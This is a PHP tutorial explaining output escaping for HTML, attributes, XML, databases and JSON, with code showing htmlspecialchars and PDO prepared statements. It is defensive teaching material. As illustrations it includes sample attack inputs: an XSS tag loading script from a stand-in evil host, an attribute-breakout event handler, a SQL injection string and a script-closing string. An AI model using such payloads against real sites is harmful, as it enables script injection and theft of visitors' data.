Escaping your output
Output escaping happens when you tell your PHP script to output some content, usually to a web page, but also to other servers, or XML files, or even the command line. Every kind of output needs to be escaped differently, which means PHP never does it automatically. So you need to learn what escaping is, and how, when, and why to do it.
Why escape output?
The short answer is that if you don't, unexpected things can happen, and a lot of those things are either bad, or very bad indeed.
For a longer answer, you need to know more about the principle of what you're doing. I'll use HTML as an example, because it's the most common case and it's pretty straightforward to explain.
An HTML document contains plain text and tags. Tags are commands that tell a browser to mark up a section of text, or insert, say, an image, or a button. The document contains both at the same time, all written in plain text. To do that, the HTML standard reserves some characters, most importantly: <, >, ", ', and &. When a browser sees a < followed by some letters, it thinks "great, time to show another picture of a kitten".
But what if you want to show a < in your text? Well, HTML has simple commands called 'entities' that let you show any character without your web browser mistaking them for commands. In this case, the entity for < is &lt;, and the process of writing one as the other is known as escaping.
So when your clever script has collected someone's name and you want to put it in your web page so that it says, "Hey Matt, how's it going?", what you're intending to send is plain text, not commands. That means you have to turn all the command characters in that text (like < and >) into HTML entities (like &lt; and &gt;). And that's what output escaping is.
If you don't do it, someone with unusual parents might be called <script src="http://evilsite.com/take_over_the_world.js"></script>, and your simple greeting just turned into what's known as a Cross-Site Scripting (XSS) attack. XSS attacks happen when you fail to escape your output, and an attacker gets to put HTML and JavaScript on your site, which then runs in your visitors' web browsers. It can do anything from ruining your layout, to embedding adverts, to stealing personal data like passwords. Sophisticated attackers can even take over your site by making privileged users do things with their login without their permission.
Output escaping stops this happening by making sure that you never send commands (HTML) when you only mean to send plain text. Along with filtering input, it's one of the standard procedures that every coder needs to use almost constantly.
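To make that concrete, here's a minimal sketch of the greeting with and without escaping. The variable names are just for illustration, and passing 'UTF-8' as the third argument is my assumption about the page's character set.

```php
<?php
// A "name" supplied by a visitor; here it's the attack string from the example above.
$name = '<script src="http://evilsite.com/take_over_the_world.js"></script>';

// Unescaped: the browser would see a real <script> tag and run it.
$unsafe = "Hey $name, how's it going?";

// Escaped: the reserved characters become entities, so the browser shows them as text.
$safe = 'Hey ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . ", how's it going?";

echo $safe, "\n";
// Hey &lt;script src=&quot;http://evilsite.com/take_over_the_world.js&quot;&gt;&lt;/script&gt;, how's it going?
```

The escaped version still reads as the original text once the browser renders it, but nothing in it can be mistaken for a tag.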
By the way…
Escaping handles output, but you also need to filter to make sure you're only accepting what you expect. I've written a separate article about that here, but the principle is that if you're expecting a number, throw out everything that isn't a number, and if you're expecting a name, throw out everything that looks like HTML. Using both input filtering and output escaping gives you a defence in depth that protects your code, your server, and your site visitors.
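As a rough sketch of the "expecting a number" case, PHP's built-in filter_var() can do the checking. The input values and variable names below are made up for the example.

```php
<?php
// Hypothetical raw inputs, as they might arrive from a form.
$rawAge = '42';
$badAge = '42; DROP TABLE users';

// FILTER_VALIDATE_INT returns the integer on success, or false if the input isn't one.
$age    = filter_var($rawAge, FILTER_VALIDATE_INT);
$reject = filter_var($badAge, FILTER_VALIDATE_INT);

var_dump($age);    // int(42)
var_dump($reject); // bool(false)
```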
When to escape your output
Generally, the best time to escape your output is as you're displaying it. This is because the kind of escaping you need to do depends on what you're displaying and where. As a trivial example, say you have a form where someone fills in their name, and then you save it to your database and then show it on screen. You need to escape separately and differently for both uses, and if you escape too soon, you'll end up making mistakes like double-escaping.
Another good reason to apply escaping as you're displaying is that it's much easier to tell that you haven't done it yet. Instead of having to look back through all your scripts, you only have to look at the template ones.
And finally, leaving the output escaping to your templates makes it much easier to reuse your code. For example you can reuse the same bit of code that asks the database for a blog entry for your web page when making an RSS feed, without having to change it. The less code you have to write, the less can go wrong with it.
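The double-escaping mistake mentioned above is easy to reproduce. This is only a sketch: $stored stands in for a value that was escaped before being saved, and the 'UTF-8' argument is my assumption.

```php
<?php
$name = 'Tom & Jerry';

// Escaping too soon: the stored value is already HTML-escaped...
$stored = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
// ...and then the template escapes it again as it displays it.
$doubleEscaped = htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');

// Escaping once, at display time.
$escapedOnce = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');

echo $doubleEscaped, "\n"; // Tom &amp;amp; Jerry
echo $escapedOnce, "\n";   // Tom &amp; Jerry
```

A browser shows the first line as "Tom &amp; Jerry" and the second as "Tom & Jerry", which is why the stored copy should stay unescaped.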
How to escape your output
Output plain text to a web page
When you're doing this, what you need to make sure of is that you don't let any of your text get mistaken for HTML. So all you need to do is turn < into &lt;, > into &gt;, and & into &amp;. Fortunately there's a nice little function that does this for you:
Instead of:
<?php echo $name; ?>
Use:
<?php echo htmlspecialchars($name, ENT_NOQUOTES); ?>
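Here's roughly what that call produces for a name containing all the reserved characters. The sample name is invented, and the explicit 'UTF-8' argument is an assumption on my part rather than something the snippet above requires.

```php
<?php
$name = 'Matt <b>"The Boss"</b> & co';

// ENT_NOQUOTES leaves both kinds of quote alone, which is fine between tags.
$escaped = htmlspecialchars($name, ENT_NOQUOTES, 'UTF-8');

echo $escaped, "\n";
// Matt &lt;b&gt;"The Boss"&lt;/b&gt; &amp; co
```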
Output plain text into an HTML tag
Perhaps the most common example of this is when you're filling in a form for someone, so I'll use that as an example.
Instead of:
<input type="text" name="name" value="<?php echo $name; ?>">
Use:
<input type="text" name="name" value="<?php echo htmlspecialchars($name, ENT_QUOTES); ?>">
If you're obsessive like me, and you only ever use double-quotes " in your HTML tags, then you can use ENT_COMPAT instead of ENT_QUOTES.
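To see why the quotes matter inside a tag, here's a small sketch with a value that tries to break out of the attribute. The tags are built as strings only so the two results can be printed side by side; the value and the 'UTF-8' argument are my own assumptions.

```php
<?php
// A value that tries to close the attribute and add one of its own.
$name = '" onfocus="alert(1)';

$unsafe = '<input type="text" name="name" value="' . $name . '">';
$safe   = '<input type="text" name="name" value="'
        . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '">';

echo $unsafe, "\n"; // <input type="text" name="name" value="" onfocus="alert(1)">
echo $safe, "\n";   // <input type="text" name="name" value="&quot; onfocus=&quot;alert(1)">
```

In the first tag the visitor has added an event handler; in the second the whole string stays inside the value attribute.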
By the way…
This is why you should avoid printing HTML, like <?php print "<b>Hi $name</b>"; ?>. When your commands and your variables are all mixed up like that, it's really hard to get output escaping right! If you find yourself doing this a lot, think about using a template language instead. There are hundreds to choose from, and any template language worth its salt will automatically handle output escaping for you.
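If a full template language is more than you need, one possible half-way step is a tiny helper with a short name, so that escaping every value is painless. The function h() here is hypothetical, not something built into PHP.

```php
<?php
// Hypothetical helper: escapes a value for use in HTML text or attributes.
function h($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

$name = '<i>Matt</i>';
?>
<b>Hi <?php echo h($name); ?></b>
```

The HTML stays as HTML, and the only PHP in the template is the escaped variable.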
Output HTML to a web page
The real problem here is that you can't do any escaping, because you're actually trying to print commands to the browser. Instead, you have to rely on filtering to make sure that you only allow good HTML through. Filtering HTML is a big topic, but there's a brief description of it in my PHP Filtering article. Don't think you can tackle this problem without a lot of knowledge though; it's much, much safer to use a filtering script that someone's already written, something like htmLawed or HTMLPurifier.
Creating XML
If you're using a library or tool to generate XML (e.g. PHP's SimpleXML, DOMDocument, or XMLWriter extensions), it should handle output escaping for you. If you're crazy enough to write it by hand, the good news is that you can just use htmlspecialchars() exactly like in the HTML instructions above.
Don't use htmlentities() though, because XML only has five predefined entities (&lt;, &gt;, &amp;, &quot;, and &apos;), and you'll get a tonne of validation errors if you try to write things like &copy;.
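A quick way to see the difference is to build the same element both ways and feed it to a parser. This sketch assumes the SimpleXML extension is available; the element name and sample text are invented.

```php
<?php
// "\xC2\xA9" is the UTF-8 encoding of the copyright sign.
$text = "\xC2\xA9 Tom & Jerry";

// htmlspecialchars() only touches the characters XML reserves.
$good = '<note>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</note>';

// htmlentities() also produces &copy;, which XML doesn't know about.
$bad = '<note>' . htmlentities($text, ENT_QUOTES, 'UTF-8') . '</note>';

// Collect parse errors quietly instead of printing warnings.
libxml_use_internal_errors(true);

var_dump(simplexml_load_string($good) !== false); // bool(true)
var_dump(simplexml_load_string($bad) !== false);  // bool(false)
```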
Talking to a database
The syntax for escaping when talking to a database depends on the database itself. For example, MySQL's default is that you need to put a \ in front of every ', while MS SQL Server's default is that you write two single quotes together, like '', when you mean one. Every database driver in PHP has a way of doing this for you. Never ever use addslashes(): it won't do what you think it does, and your database will be vulnerable to attack (which in some cases means your whole server is vulnerable).
There's a much better alternative to output escaping when it comes to databases. It's called a prepared statement. What you do is write your SQL without any of the data in it, and put in placeholders instead. PHP then sends the statement through one channel (that only allows commands), and the data through another (that never allows commands). Using prepared statements means you don't have to worry about escaping, and as long as every piece of data goes in through a placeholder rather than being pasted into the SQL, it stops what's known as an SQL injection attack.
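To show how the rules differ per database, here's a sketch comparing addslashes() with a driver's own quoting. I've swapped in an in-memory SQLite database so it runs without a server, which assumes the pdo_sqlite extension is installed; SQLite happens to use the doubled-quote style.

```php
<?php
$name = "O'Reilly";

// addslashes() always uses a backslash, whatever the database expects.
$slashed = addslashes($name);

// The driver's own quoting follows the database's rules and adds the outer quotes.
$db = new PDO('sqlite::memory:');
$quoted = $db->quote($name);

echo $slashed, "\n"; // O\'Reilly
echo $quoted, "\n";  // 'O''Reilly'
```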
Most databases now offer this, and the easiest way to take advantage of them in PHP is by using the built-in PDO extension. I'll write more about using PDO and prepared statements another day, but here's a very brief example:
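<?php
// Connect; the host, database name, and credentials are placeholders.
$db = new PDO('mysql:host=hostname;dbname=defaultDbName',
    'username', 'password',
    array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES utf8"));
// Write the SQL with a named placeholder where the data would go.
$query = 'SELECT * FROM my_table WHERE title = :title';
$stmt = $db->prepare($query);
// Hand over the data separately, so it is never read as part of the SQL.
$stmt->bindValue(':title', $myTitle);
$stmt->execute();
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
    // ...
}
?>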
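If you want to try the idea without setting up MySQL, the same pattern can be sketched against an in-memory SQLite database. This assumes the pdo_sqlite extension is installed, and the table contents are made up.

```php
<?php
// In-memory SQLite database, so there's nothing to set up.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE my_table (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO my_table (title) VALUES ('First post')");
$db->exec("INSERT INTO my_table (title) VALUES ('Second post')");

$stmt = $db->prepare('SELECT * FROM my_table WHERE title = :title');

// A normal title finds its row.
$stmt->bindValue(':title', 'First post');
$stmt->execute();
$found = $stmt->fetchAll(PDO::FETCH_ASSOC);

// An injection attempt is just compared as a title, and matches nothing.
$stmt->bindValue(':title', "' OR '1'='1");
$stmt->execute();
$attack = $stmt->fetchAll(PDO::FETCH_ASSOC);

echo count($found), "\n";  // 1
echo count($attack), "\n"; // 0
```

Had the second value been pasted straight into the SQL string, the WHERE clause would have matched every row.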
Other times you need to do output escaping
- Sending email
- Writing to JavaScript (be very careful)
- Making JSON (PHP 5.2's json_encode() does this for you)
- Almost everywhere else!
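For the JavaScript and JSON cases, here's one possible sketch of passing a PHP string into an inline script. The JSON_HEX_* flags need PHP 5.3 or later, and using them this way is my suggestion rather than something covered above; the sample comment is invented.

```php
<?php
// Text that tries to close the surrounding <script> block.
$comment = 'Nice post </script><script>alert("hi")</script>';

// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes,
// so the result can't end the script block early.
$json = json_encode($comment, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

echo '<script>var comment = ', $json, ';</script>', "\n";
```

The encoded value contains no angle brackets, and JavaScript decodes it back to the original text.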